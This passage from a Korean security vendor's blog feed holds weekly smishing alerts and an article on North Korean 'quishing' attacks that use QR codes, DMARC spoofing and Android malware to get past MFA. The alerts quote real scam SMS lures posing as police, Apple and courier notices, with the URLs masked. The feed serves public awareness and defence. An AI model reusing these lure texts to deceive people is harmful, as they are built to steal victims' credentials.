      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5706</guid>
      <comments>https://alyacofficialblog.tistory.com/5706#entry5706comment</comments>
      <pubDate>Mon, 26 Jan 2026 09:09:59 +0900</pubDate>
    </item>
    <item>
      <title>[국제발신] CJ : 추가 비용으로 인해 배송이 중단되었습니다. cj-l****ics.vip을 방문해 주세요.</title>
      <link>https://alyacofficialblog.tistory.com/5705</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;다운로드.png&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/q6e8c/dJMcabCYP5a/KIgAy9FxCBGSaOektxDbS0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/q6e8c/dJMcabCYP5a/KIgAy9FxCBGSaOektxDbS0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/q6e8c/dJMcabCYP5a/KIgAy9FxCBGSaOektxDbS0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fq6e8c%2FdJMcabCYP5a%2FKIgAy9FxCBGSaOektxDbS0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;692&quot; height=&quot;440&quot; data-filename=&quot;다운로드.png&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #409d00;&quot;&gt;&lt;b&gt;[1월 넷째주]&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;알약&amp;nbsp;스미싱&amp;nbsp;알림&amp;nbsp;본&amp;nbsp;포스트는&amp;nbsp;알약M&amp;nbsp;사용자&amp;nbsp;분들이&amp;nbsp;'신고하기'&amp;nbsp;기능을&amp;nbsp;통해&amp;nbsp;알약으로&amp;nbsp;신고해&amp;nbsp;주신&amp;nbsp;스미싱&amp;nbsp;내역&amp;nbsp;중&amp;nbsp;'특이&amp;nbsp;문자'를&amp;nbsp;자체&amp;nbsp;수집,&amp;nbsp;집계하여&amp;nbsp;제공해&amp;nbsp;드리는&amp;nbsp;정보성&amp;nbsp;포스트입니다.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: #409d00;&quot;&gt;&lt;b&gt;특이 문자&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;div style=&quot;color: #333333; text-align: start;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style14&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #008300; color: #ffffff; text-align: center;&quot;&gt;No.&lt;/td&gt;
&lt;td style=&quot;background-color: #008300; color: #ffffff; text-align: center;&quot;&gt;문자내용&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #efefef; text-align: center;&quot;&gt;1&lt;/td&gt;
&lt;td&gt;[경찰청(이파인)] 귀하께(신호미준수)사실확인되어 과태료부과내용이 발송되었습니다. hxxps://mz.***k.hair&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #efefef; text-align: center;&quot;&gt;2&lt;/td&gt;
&lt;td style=&quot;background-color: #f9f9f9;&quot;&gt;[국외발신][Apple] 귀하의 계정이 다른 위치에서 로그인되었습니다. 즉시 확인해 주세요. kr-****ne.com&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #efefef; text-align: center;&quot;&gt;3&lt;/td&gt;
&lt;td&gt;[국제발신] CJ : 추가 비용으로 인해 배송이 중단되었습니다. cj-l****ics.vip을 방문해 주세요.&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;다운로드 (1).png&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cyPdX2/dJMcajnq8Vw/2qw53m5YX0lHsvw8e23A4k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cyPdX2/dJMcajnq8Vw/2qw53m5YX0lHsvw8e23A4k/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cyPdX2/dJMcajnq8Vw/2qw53m5YX0lHsvw8e23A4k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcyPdX2%2FdJMcajnq8Vw%2F2qw53m5YX0lHsvw8e23A4k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;400&quot; height=&quot;150&quot; data-filename=&quot;다운로드 (1).png&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;출처&amp;nbsp;:&amp;nbsp;알약M&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;기간&amp;nbsp;:&amp;nbsp;2026년&amp;nbsp;1월&amp;nbsp;17일&amp;nbsp;~&amp;nbsp;2025년&amp;nbsp;1월&amp;nbsp;23일&lt;/p&gt;</description>
      <category>안전한 PC&amp;amp;모바일 세상/스미싱 알림</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5705</guid>
      <comments>https://alyacofficialblog.tistory.com/5705#entry5705comment</comments>
      <pubDate>Fri, 23 Jan 2026 10:55:50 +0900</pubDate>
    </item>
    <item>
      <title>이메일보다 교묘하다! QR 코드로 침투하는 신종 피싱 &amp;lsquo;퀴싱&amp;rsquo;</title>
      <link>https://alyacofficialblog.tistory.com/5704</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최근 미국 FBI가 북한의 국가 배후 해킹 조직 김수키(Kimsuky)가 악성 QR 코드를 활용한 새로운 형태의 스피어피싱, 이른바 &lt;span&gt;&lt;b&gt;&amp;lsquo;퀴싱(Quishing)&amp;rsquo;&lt;/b&gt;&lt;/span&gt; 공격을 전개하고 있다며 긴급 경고를 발표했습니다. QR 코드라는 일상적인 도구가, 이제는 국가 배후 APT 공격의 핵심 침투 수단으로 활용되고 있다는 점에서 기업과 기관 모두 각별한 주의가 필요합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384085.png&quot; data-origin-width=&quot;1024&quot; data-origin-height=&quot;683&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cc5oDc/dJMcacWaqLV/pMkSc2PJK25n1T0rj4Aj2k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cc5oDc/dJMcacWaqLV/pMkSc2PJK25n1T0rj4Aj2k/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cc5oDc/dJMcacWaqLV/pMkSc2PJK25n1T0rj4Aj2k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcc5oDc%2FdJMcacWaqLV%2FpMkSc2PJK25n1T0rj4Aj2k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1024&quot; height=&quot;683&quot; data-filename=&quot;Group 2034384085.png&quot; data-origin-width=&quot;1024&quot; data-origin-height=&quot;683&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;QR 코드로 시작되는 정교한 침투 시나리오&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번에 확인된 퀴싱 공격의 가장 큰 특징은 공격의 출발점이 &amp;lsquo;개인 모바일 기기&amp;rsquo;라는 점입니다. 김수키 조직은 기업 보안 정책이 적용된 업무용 PC가 아닌, 상대적으로 보안 통제가 느슨한 개인 스마트폰을 노렸습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이들은 싱크탱크, 학술기관, 정부기관 관계자를 정밀 타깃으로 삼아 설문조사 요청, 가짜 컨퍼런스 초청, 보안 드라이브 접근 안내 등 그럴듯한 명분을 내세운 이메일을 발송했고, 이메일에는 자연스럽게 QR 코드가 삽입돼 있었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;문제는 이 이메일이 단순한 피싱 메일이 아니라는 점입니다. 공격자들은 &lt;span&gt;DMARC 정책 설정 오류&lt;/span&gt;를 악용해, 실제 신뢰 가능한 기관에서 발송된 것처럼 보이도록 이메일을 위장했습니다. 사용자가 아무 의심 없이 QR 코드를 스캔하는 순간, 공격자는 이미 다음 단계로 넘어가게 됩니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;모바일에서 시작해 계정 탈취까지, MFA도 우회된다&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;QR 코드를 스캔하면 사용자는 공격자가 통제하는 피싱 사이트로 이동하게 되며, 이 과정에서 구글 계정 등 업무와 연동된 자격 증명이 탈취됩니다. 최근에는 국내 서울 소재 물류 회사를 사칭해 '닥스왑(DocSwap)&amp;rsquo;으로 불리는 새로운 안드로이드 악성코드를 유포한 정황도 포착됐습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;이 악성 앱은 단말 정보, 문자 메시지, 사진 등 민감한 정보를 탈취할 수 있으며, 더 큰 문제는 &lt;span&gt;세션 토큰 탈취를 통해 다요소인증(MFA)까지 우회&lt;/span&gt;할 수 있다는 점입니다.&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;탈취된 계정은 여기서 끝나지 않습니다. 공격자는 해당 계정을 발판 삼아 조직 내부를 대상으로 한 &lt;span&gt;2차 스피어피싱&lt;/span&gt;을 확산시키고, 결과적으로 피해 범위를 기하급수적으로 확대합니다. 이 모든 과정이 기업의 EDR이나 네트워크 보안 관제 범위 밖인 &lt;span&gt;개인 모바일 기기에서 시작된다&lt;/span&gt;는 점이, 방어자 입장에서는 치명적인 허점으로 작용합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;&amp;lsquo;편의성&amp;rsquo;이 만든 새로운 보안 사각지대&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;FBI는 이번 사례를 두고, 퀴싱이 이제 기업 환경에서 &lt;span&gt;MFA를 무력화할 수 있는 고신뢰 침투 벡터&lt;/span&gt;로 자리 잡았다고 분석했습니다. 기술적 취약점보다 인간의 심리, 그리고 모바일 보안에 대한 방심을 정교하게 파고든 공격이라는 평가입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;QR 코드는 더 이상 단순한 편의 도구가 아닙니다. 클릭 한 번, 스캔 한 번이 곧 조직 전체 계정과 클라우드 자산을 넘겨주는 출발점이 될 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;기업과 사용자가 반드시 점검해야 할 대응 포인트&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번 공격이 시사하는 바는 분명합니다. &lt;span&gt;보안의 경계는 이미 PC를 넘어 모바일로 확장&lt;/span&gt;됐습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;☑︎ &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;출처가 불분명한 이메일&amp;middot;메시지에 포함된 QR 코드는 절대 스캔하지 않기&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;☑︎ &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;QR 코드로 유도되는 앱 설치, 로그인 요청에 대한 경각심 강화&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;☑︎ &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;조직 차원의&amp;nbsp;모바일 기기 관리(MDM)&amp;nbsp;정책 강화&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;☑︎ &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;임직원 대상 퀴싱&amp;middot;큐싱 등 최신 피싱 기법 교육 정례화&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;☑︎ &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;모바일까지 포함한 전사적 가시성과 실시간 위협 모니터링 체계 재정비&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;북한 김수키 조직의 공세는 2026년에도 더욱 지능화된 형태로 이어질 가능성이 높습니다. 결국 이번 사건은, 우리가 무심코 사용하는 QR 코드 하나가 국가 배후 해커에게는 강력한 사이버 무기로 변모할 수 있음을 명확히 보여주고 있습니다. 보안의 사각지대를 방치한다면, 기업의 핵심 데이터 주권 역시 언제든 위협받을 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;QR 코드 하나로 시작된 이번 퀴싱 공격 사례는, 보안 위협이 더 이상 특정 시스템이나 기술 영역에 국한되지 않는다는 사실을 다시 한 번 상기시킵니다. 특히 개인 모바일 기기를 기점으로 다요소인증(MFA)까지 우회하는 공격이 현실화된 지금, &amp;lsquo;조심하면 된다&amp;rsquo;는 인식만으로는 더 이상 충분하지 않습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;출처가 불분명한 QR 코드 스캔을 경계하는 개인 차원의 주의는 물론, 조직 차원에서도 모바일 기기까지 포함한 보안 정책 점검과 임직원 보안 인식 제고가 반드시 병행돼야 할 시점입니다. 일상의 편의성을 노린 공격일수록 피해는 더 치명적일 수 있다는 점을 인지하고, 작은 행동 하나에도 각별한 보안 주의가 요구됩니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>개인보안</category>
      <category>기업보안</category>
      <category>모바일보안</category>
      <category>보안동향</category>
      <category>보안수칙</category>
      <category>퀴싱</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5704</guid>
      <comments>https://alyacofficialblog.tistory.com/5704#entry5704comment</comments>
      <pubDate>Tue, 20 Jan 2026 16:42:12 +0900</pubDate>
    </item>
    <item>
      <title>[경찰청민원24] 과태료청구서가 전달되었습니다. hxxps://poa.***g[.]my</title>
      <link>https://alyacofficialblog.tistory.com/5703</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;다운로드.png&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/xGz6q/dJMcabiBK2a/mSuPcFDPkXvYD2Z7eTm7Jk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/xGz6q/dJMcabiBK2a/mSuPcFDPkXvYD2Z7eTm7Jk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/xGz6q/dJMcabiBK2a/mSuPcFDPkXvYD2Z7eTm7Jk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FxGz6q%2FdJMcabiBK2a%2FmSuPcFDPkXvYD2Z7eTm7Jk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;692&quot; height=&quot;440&quot; data-filename=&quot;다운로드.png&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #409d00;&quot;&gt;&lt;b&gt;[1월 셋째주]&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;알약&amp;nbsp;스미싱&amp;nbsp;알림&amp;nbsp;본&amp;nbsp;포스트는&amp;nbsp;알약M&amp;nbsp;사용자&amp;nbsp;분들이&amp;nbsp;'신고하기'&amp;nbsp;기능을&amp;nbsp;통해&amp;nbsp;알약으로&amp;nbsp;신고해&amp;nbsp;주신&amp;nbsp;스미싱&amp;nbsp;내역&amp;nbsp;중&amp;nbsp;'특이&amp;nbsp;문자'를&amp;nbsp;자체&amp;nbsp;수집,&amp;nbsp;집계하여&amp;nbsp;제공해&amp;nbsp;드리는&amp;nbsp;정보성&amp;nbsp;포스트입니다.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: #409d00;&quot;&gt;&lt;b&gt;특이 문자&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;div style=&quot;color: #333333; text-align: start;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-style=&quot;style14&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #008300; color: #ffffff; text-align: center;&quot;&gt;No.&lt;/td&gt;
&lt;td style=&quot;background-color: #008300; color: #ffffff; text-align: center;&quot;&gt;문자내용&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #efefef; text-align: center;&quot;&gt;1&lt;/td&gt;
&lt;td&gt;[경찰청민원24] 과태료청구서가 전달되었습니다. hxxps://poa.***g[.]my&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #efefef; text-align: center;&quot;&gt;2&lt;/td&gt;
&lt;td style=&quot;background-color: #f9f9f9;&quot;&gt;[경찰청민원24] 과태료청구서가 발부되었습니다. https://moa.n***.my&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;background-color: #efefef; text-align: center;&quot;&gt;3&lt;/td&gt;
&lt;td&gt;[경찰청24] 귀하에게 고지서가 발부되었습니다. 고지서내용 열람바랍니다. https://yoa.***n.mobi&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;다운로드 (1).png&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b0hHU0/dJMcabiBK2o/XkKynPrqVMhsVNx3Lpv3M0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b0hHU0/dJMcabiBK2o/XkKynPrqVMhsVNx3Lpv3M0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b0hHU0/dJMcabiBK2o/XkKynPrqVMhsVNx3Lpv3M0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb0hHU0%2FdJMcabiBK2o%2FXkKynPrqVMhsVNx3Lpv3M0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;400&quot; height=&quot;150&quot; data-filename=&quot;다운로드 (1).png&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;

&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;출처&amp;nbsp;:&amp;nbsp;알약M&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;기간 : 2026년 1월 10일 ~ 2025년 1월 16일&lt;/p&gt;</description>
      <category>안전한 PC&amp;amp;모바일 세상/스미싱 알림</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5703</guid>
      <comments>https://alyacofficialblog.tistory.com/5703#entry5703comment</comments>
      <pubDate>Fri, 16 Jan 2026 14:08:01 +0900</pubDate>
    </item>
    <item>
      <title>2025년 4분기 알약 랜섬웨어 행위기반 차단 건수 총 59,162건!</title>
      <link>https://alyacofficialblog.tistory.com/5702</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;2025-4분기.png&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cHEz17/dJMcahwn9YM/wdnlzUcoASQkpzMkq0wOc1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cHEz17/dJMcahwn9YM/wdnlzUcoASQkpzMkq0wOc1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cHEz17/dJMcahwn9YM/wdnlzUcoASQkpzMkq0wOc1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcHEz17%2FdJMcahwn9YM%2FwdnlzUcoASQkpzMkq0wOc1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;692&quot; height=&quot;440&quot; data-filename=&quot;2025-4분기.png&quot; data-origin-width=&quot;692&quot; data-origin-height=&quot;440&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
